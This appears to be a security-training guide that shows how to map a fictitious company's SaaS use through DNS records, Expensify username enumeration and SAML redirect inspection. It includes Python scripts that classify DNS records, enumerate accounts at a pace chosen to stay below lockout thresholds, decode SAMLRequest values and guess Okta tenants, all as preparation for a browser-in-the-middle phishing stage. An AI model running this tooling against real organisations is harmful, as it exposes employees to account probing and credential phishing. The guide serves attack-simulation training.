
Identifying Corporate SaaS Attack Surfaces

Published by r4 on Oct 28, 2024

For years, networks and endpoints were the attack surface. Today, cloud apps and identities are the attacker’s land of opportunity.

In this guide we'll step through several examples of reconnaissance techniques for enumerating corporate SaaS environments. We'll target a fictitious company – Yellow Steel – to gather information about which SaaS apps the organization uses, how those apps are configured, and what identities are associated with them. In a follow-on guide, we'll use that information to attempt to gain access to one or more of those applications.

Environment Prep

Do you just want to focus on this SaaS reconnaissance guide? A Chrome-based browser is all you'll need.

Interested in targeting a fictitious company through the entire SaaS kill chain? You can launch your own dedicated SaaS range containing 15 connected applications along with attacker and victim browser-based workspaces using r4 here.

Reconnaissance Overview

We'll focus on three reconnaissance techniques, which are described in detail in Push Security's SaaS attack matrix. Those techniques are:

  1. DNS reconnaissance (ID: SAT1013)
  2. Username enumeration (ID: SAT1038)
  3. SAML enumeration (ID: SAT1031)

To explore the entire SaaS attack matrix, see SaaS Attack Techniques by Push Security.

Apps of Interest

A number of app categories make up the SaaS attack surface, and each is likely to hold data the organization wants to protect. To keep this guide a digestible length, we've scoped our recon examples to the first three on the list: email service providers, expense management, and IAM/IdP.

  1. email service providers
  2. expense management
  3. IAM and IdP
  4. CRM
  5. observability
  6. productivity
  7. automation
  8. project management
  9. human resources
  10. payroll services
  11. ITSM
  12. file storage
  13. DevSecOps
  14. marketing

DNS Reconnaissance to Discover Email Service Providers

Some SaaS apps require proof of domain ownership during setup. The usual mechanism is to have the administrator publish a vendor-specific string as a DNS TXT record on the domain, which the vendor then looks up. Because those records are public and are rarely cleaned up, querying a target's TXT records can reveal which SaaS apps the organization uses (or used; a stale verification record is a lead, not confirmation). MX records show which provider receives mail for the domain, and the include: mechanisms in the SPF record show which services are authorised to send as the domain, so both are worth pulling in the same pass.

Steps

  1. from a local machine browser or an r4-provisioned attacker virtual desktop workspace, open a new Chrome-based browser tab and navigate to your favorite TXT record lookup tool. We like – https://mxtoolbox.com/TXTLookup.aspx

  2. type in Yellow Steel's primary domain name shown below

yellow-steel.cloud

  3. notice the TXT record results referring to Zoho Mail, an email service provider similar to Gmail

TXT Record Results

DNS Recon Video
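The manual lookup above is fine for one domain, but the same classification is easy to script. The following is an added example, not code from the original guide or from r4: it maps TXT verification prefixes, SPF include: targets and MX hosts to the vendors that publish them. The sample records for yellow-steel.cloud are constructed (the verification tokens are made up); only the prefix and host patterns are the real strings to look for.

```python
"""Classify DNS TXT, SPF and MX data into the SaaS vendors it reveals.

Added example, not code from the original guide. The record values below are
constructed (the verification tokens are made up); only the vendor prefix and
host patterns are the real strings to look for. Feed it `dig +short` output
for a real domain via parse_dig_short().
"""
import re
from typing import Dict, Iterable, List

# TXT domain-verification prefixes published by common SaaS vendors. A hit
# means someone controlling the zone completed that vendor's ownership check.
TXT_PREFIXES = {
    "zoho-verification=": "Zoho (Mail/Workplace)",
    "google-site-verification=": "Google Workspace / Search Console",
    "MS=": "Microsoft 365",
    "atlassian-domain-verification=": "Atlassian Cloud",
    "docusign=": "DocuSign",
    "adobe-idp-site-verification=": "Adobe",
    "dropbox-domain-verification=": "Dropbox Business",
    "apple-domain-verification=": "Apple Business Manager",
    "stripe-verification=": "Stripe",
    "miro-verification=": "Miro",
}
# SPF include: targets reveal who is authorised to send as the domain.
SPF_INCLUDES = {
    "zoho.com": "Zoho Mail",
    "_spf.google.com": "Google Workspace",
    "spf.protection.outlook.com": "Microsoft 365",
    "sendgrid.net": "SendGrid",
    "amazonses.com": "Amazon SES",
    "servers.mcsv.net": "Mailchimp",
    "mail.zendesk.com": "Zendesk",
    "_spf.salesforce.com": "Salesforce",
}
# MX hosts reveal who receives mail (or filters it in front of the mailbox).
MX_SUFFIXES = {
    ".zoho.com": "Zoho Mail",
    ".google.com": "Google Workspace",
    ".mail.protection.outlook.com": "Microsoft 365",
    ".pphosted.com": "Proofpoint",
    ".mimecast.com": "Mimecast",
}


def parse_dig_short(text: str) -> List[str]:
    """Join the quoted chunks `dig +short TXT` prints for each record."""
    out = []
    for line in text.splitlines():
        chunks = re.findall(r'"((?:[^"\\]|\\.)*)"', line)
        if chunks:
            out.append("".join(chunks))
    return out


def _host_matches(name: str, suffix: str) -> bool:
    name = name.lower().rstrip(".")
    suffix = suffix.lower().lstrip(".")
    return name == suffix or name.endswith("." + suffix)


def classify_records(txt: Iterable[str], mx: Iterable[str] = ()) -> Dict[str, List[str]]:
    """Return {vendor: [evidence, ...]} from TXT/SPF/MX data."""
    found: Dict[str, set] = {}
    for rec in txt:
        value = rec.strip().strip('"')
        if value.lower().startswith("v=spf1"):
            for inc in re.findall(r"include:([\w.\-]+)", value, re.I):
                for host, vendor in SPF_INCLUDES.items():
                    if _host_matches(inc, host):
                        found.setdefault(vendor, set()).add(f"SPF include:{inc}")
            continue
        for prefix, vendor in TXT_PREFIXES.items():
            if value.lower().startswith(prefix.lower()):
                found.setdefault(vendor, set()).add(f"TXT {prefix}")
    for host in mx:
        for suffix, vendor in MX_SUFFIXES.items():
            if _host_matches(host, suffix):
                found.setdefault(vendor, set()).add(f"MX {host.rstrip('.')}")
    return {v: sorted(e) for v, e in sorted(found.items())}


# Constructed sample for yellow-steel.cloud, in `dig +short` form.
SAMPLE_TXT = parse_dig_short(
    '"v=spf1 include:zoho.com include:sendgrid.net ~all"\n'
    '"zoho-verification=zb00000000.zmverify.zoho.com"\n'
    '"atlassian-domain-verification=EXAMPLETOKEN0001"\n'
)
SAMPLE_MX = ["mx.zoho.com.", "mx2.zoho.com."]

if __name__ == "__main__":
    for vendor, evidence in classify_records(SAMPLE_TXT, SAMPLE_MX).items():
        print(f"{vendor:35} {', '.join(evidence)}")
```

For a live domain, paste the output of `dig +short TXT yellow-steel.cloud` and `dig +short MX yellow-steel.cloud` into parse_dig_short() and classify_records(); the vendor tables are deliberately small and should be extended with whatever prefixes you meet in the field.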

Username Enumeration to Discover Expense Management User Accounts

When you attempt to authenticate to a SaaS app, the login flow itself may disclose whether the username or email address belongs to a valid account, regardless of the password supplied. Because most SaaS apps use the email address as the username, and the domain part of that address identifies the organization, submitting plausible addresses for the target's domain tells you two things at once: whether the organization uses the app at all, and which individual employees hold accounts there.

Imagine we've compiled a list of Yellow Steel employee names and the company's email address format ([first].[last]@yellow-steel.cloud). Let's attempt to discover if Yellow Steel uses a cloud-based expense management application like Expensify.

Yellow Steel employees:

  • Regan Norton
  • Libbie Gallagher
  • Zachary Walter
  • Yash Bonner
  • John Smith

Steps

  1. from a local machine browser or an r4-provisioned attacker virtual desktop workspace, open a new Chrome-based browser tab

  2. right click and select "Inspect" from the menu

  3. in the new pane, select the "Network" tab, then select "Fetch/XHR" beneath the filter section

  4. navigate to https://expensify.com

  5. select "Sign In", then select "Email" from the modal

  6. enter the email address below. It follows Yellow Steel's address format, but "John Doe" is not on the employee list

john.doe@yellow-steel.cloud

  7. select the newly populated "GetAccountStatus" API call from the name column

  8. notice the value for the accountExists field is "false"

  9. now select "Back", then select "Email", enter the email address for the Yellow Steel employee shown below, then select "Next"

regan.norton@yellow-steel.cloud

  10. select the newly populated "GetAccountStatus" API call from the name column

  11. notice the value for the accountExists field is "true", indicating an Expensify account exists for Regan Norton's corporate address

  12. close the "Inspect" pane, but leave your browser tab "as is" for the next section

Username Enum Video
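Once you have confirmed by hand that the status call leaks account existence, the remaining work is mechanical. The harness below is an added example, not code from the original guide or from Expensify: it builds candidate addresses from the employee list and the [first].[last] format, sends each to a probe function, and reads the accountExists field from the response. The request URL, body template and headers in make_http_probe are placeholders to copy from the GetAccountStatus call you captured in the Network tab (the example does not reproduce that request's real parameters); the canned responses at the bottom are constructed so the harness runs offline.

```python
"""Username enumeration harness for a login flow that leaks account
existence, as the GetAccountStatus/accountExists response above does.

Added example, not code from the original guide or from Expensify. The request
URL, body template and headers are placeholders to be copied from the
GetAccountStatus call captured in the Network tab; this example does not
reproduce that request's real parameters. The canned responses at the bottom
are constructed so the harness runs offline.
"""
import json
import random
import time
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

DOMAIN = "yellow-steel.cloud"
EMPLOYEES = ["Regan Norton", "Libbie Gallagher", "Zachary Walter",
             "Yash Bonner", "John Smith"]


def candidates(full_name: str, domain: str = DOMAIN) -> List[str]:
    """[first].[last]@domain is the format given in the guide; the other two
    patterns are common fallbacks worth trying when the primary gets no hit."""
    parts = full_name.lower().split()
    first, last = parts[0], parts[-1]
    return [f"{first}.{last}@{domain}", f"{first[0]}{last}@{domain}",
            f"{first}@{domain}"]


def account_exists(body: str) -> Optional[bool]:
    """Read accountExists from a JSON response. None means the field was not
    there (rate limit, captcha page, API change) and must not be read as 'no'."""
    try:
        value = json.loads(body).get("accountExists")
    except (json.JSONDecodeError, AttributeError):
        return None
    return value if isinstance(value, bool) else None


def make_http_probe(url: str, body_template: str,
                    headers: Dict[str, str]) -> Callable[[str], str]:
    """Replay a captured request with {email} substituted (placeholder shape)."""
    def probe(email: str) -> str:
        data = body_template.replace("{email}", email).encode()
        req = urllib.request.Request(url, data=data, headers=headers, method="POST")
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read().decode()
    return probe


def enumerate_accounts(names: List[str], probe: Callable[[str], str],
                       delay: Tuple[float, float] = (1.0, 3.0),
                       domain: str = DOMAIN) -> Tuple[List[str], List[str]]:
    """Return (confirmed, unknown). Stops at the first confirmed address per
    person; a random pause between requests keeps the tool slow on purpose,
    below typical rate-limit and lockout thresholds."""
    confirmed, unknown = [], []
    for name in names:
        for email in candidates(name, domain):
            status = account_exists(probe(email))
            if status is None:
                unknown.append(email)
            elif status:
                confirmed.append(email)
                break
            time.sleep(random.uniform(*delay))
    return confirmed, unknown


# Constructed offline stand-in for the live endpoint.
CANNED: Dict[str, str] = {
    "regan.norton@yellow-steel.cloud": '{"accountExists": true}',
    "libbie.gallagher@yellow-steel.cloud": "<html>429 Too Many Requests</html>",
    "jsmith@yellow-steel.cloud": '{"accountExists": true}',
}


def canned_probe(email: str) -> str:
    return CANNED.get(email, '{"accountExists": false}')


if __name__ == "__main__":
    hits, retry = enumerate_accounts(EMPLOYEES, canned_probe, delay=(0, 0))
    print("confirmed:", hits)
    print("recheck later:", retry)
```

Two design points matter more than the loop itself. First, a response without the expected field goes into the "unknown" bucket rather than being counted as a miss, so a rate limit or captcha partway through the list does not silently produce false negatives. Second, the probe is injected, so the same harness works against any app whose login leaks existence once you swap in the captured request and the field name that app uses.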

SAML Enumeration to Discover IdP Provider

If a SaaS app supports SAML single sign-on, an adversary can learn both that the target uses the app and which identity provider sits behind it: start the app's SSO flow with an address at the target's email domain and watch where the browser is redirected, or guess tenant subdomains or path-based tenant names derived from the organization's name.

Steps

  1. in your existing Expensify browser tab, select "Single Sign-on" from the modal

  2. notice you are redirected to an Okta login screen, indicating Yellow Steel uses Okta to manage SSO logins for at least some of their SaaS applications. The tenant hostname in that URL is worth recording; it is the page the next phase will impersonate

SAML Enum Video
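The redirect you just watched carries more than the IdP's hostname. With the HTTP-Redirect binding the SP appends a SAMLRequest parameter, a DEFLATE-compressed, base64-encoded AuthnRequest whose Destination is the IdP's SSO endpoint and whose Issuer is the SP's entity ID, which identifies the app-to-IdP integration precisely. The following is an added example, not code from the original guide or from Okta or Expensify: it decodes that parameter, names the IdP from the redirect host, and generates the per-tenant hostnames to probe when no SP redirect does the work for you. The AuthnRequest, the tenant hostname yellow-steel.okta.com and the SP entity ID are constructed assumptions, not values captured from Expensify or Yellow Steel.

```python
"""Decode the SAMLRequest an SP hands the browser on the SSO click and name
the IdP from where the request is sent.

Added example, not code from the original guide. The AuthnRequest, the tenant
hostname yellow-steel.okta.com and the SP entity ID below are constructed
assumptions, not values captured from Expensify or Yellow Steel.
"""
import base64
import zlib
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional
from urllib.parse import parse_qs, quote, urlparse

IDP_HOSTS = {
    "okta.com": "Okta", "oktapreview.com": "Okta (preview)",
    "okta-emea.com": "Okta (EMEA)",
    "login.microsoftonline.com": "Microsoft Entra ID",
    "onelogin.com": "OneLogin", "auth0.com": "Auth0", "pingone.com": "PingOne",
    "accounts.google.com": "Google Workspace", "jumpcloud.com": "JumpCloud",
    "duosecurity.com": "Duo",
}
NS = {"samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
      "saml": "urn:oasis:names:tc:SAML:2.0:assertion"}


def identify_idp(host: str) -> str:
    host = host.lower()
    for suffix, name in IDP_HOSTS.items():
        if host == suffix or host.endswith("." + suffix):
            return name
    return "unknown"


def encode_redirect_request(xml_text: str) -> str:
    """What an SP does for the HTTP-Redirect binding: raw DEFLATE, then base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(xml_text.encode()) + comp.flush()).decode()


def decode_saml_request(param: str) -> bytes:
    """Reverse of the above; falls back to plain base64 (HTTP-POST binding)."""
    raw = base64.b64decode(param)
    try:
        return zlib.decompress(raw, -15)
    except zlib.error:
        return raw


def inspect_sso_redirect(location_url: str) -> Dict[str, Optional[str]]:
    """From the Location header of the SSO redirect: IdP name, tenant host,
    the IdP SSO endpoint (Destination), the SP entity ID (Issuer) and ACS URL."""
    u = urlparse(location_url)
    host = u.hostname or ""
    info: Dict[str, Optional[str]] = {"tenant_host": host, "idp": identify_idp(host)}
    qs = parse_qs(u.query)
    if "SAMLRequest" in qs:
        root = ET.fromstring(decode_saml_request(qs["SAMLRequest"][0]))
        issuer = root.find("saml:Issuer", NS)
        info["destination"] = root.get("Destination")
        info["acs_url"] = root.get("AssertionConsumerServiceURL")
        info["sp_entity_id"] = issuer.text.strip() if issuer is not None and issuer.text else None
    return info


def tenant_candidates(org: str) -> List[str]:
    """Hostnames to probe when no SP redirect does the work for you: the
    per-tenant subdomain patterns Okta and OneLogin use. A missing tenant and
    a real login page look different enough to tell apart."""
    slugs = {org.lower().replace(" ", "-"), org.lower().replace(" ", "")}
    return sorted(f"{s}.{d}" for s in slugs
                  for d in ("okta.com", "okta-emea.com", "onelogin.com"))


# Constructed AuthnRequest and the redirect URL an SP would build from it.
SAMPLE_AUTHN_REQUEST = (
    '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_example1" '
    'Version="2.0" IssueInstant="2024-10-28T00:00:00Z" '
    'Destination="https://yellow-steel.okta.com/app/example/sso/saml" '
    'AssertionConsumerServiceURL="https://sp.example.com/saml/acs">'
    '<saml:Issuer>https://sp.example.com/saml/metadata</saml:Issuer>'
    '</samlp:AuthnRequest>'
)
SAMPLE_LOCATION = ("https://yellow-steel.okta.com/app/example/sso/saml?SAMLRequest="
                   + quote(encode_redirect_request(SAMPLE_AUTHN_REQUEST), safe=""))

if __name__ == "__main__":
    for k, v in inspect_sso_redirect(SAMPLE_LOCATION).items():
        print(f"{k:13} {v}")
    print(tenant_candidates("Yellow Steel"))
```

Against a real target, paste the Location header from the 302 the Network tab shows after the SSO click into inspect_sso_redirect(). The Destination and Issuer values are what a browser-in-the-middle setup has to reproduce faithfully for the flow to look genuine to the victim, which is why they are worth capturing now.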

In the next guide – titled BitM Phishing for Initial Access – we'll step through a browser-in-the-middle phishing example where we impersonate the Expensify and Okta apps to get access to a Yellow Steel employee's Okta dashboard.


The private beta is live. If you are interested contact us.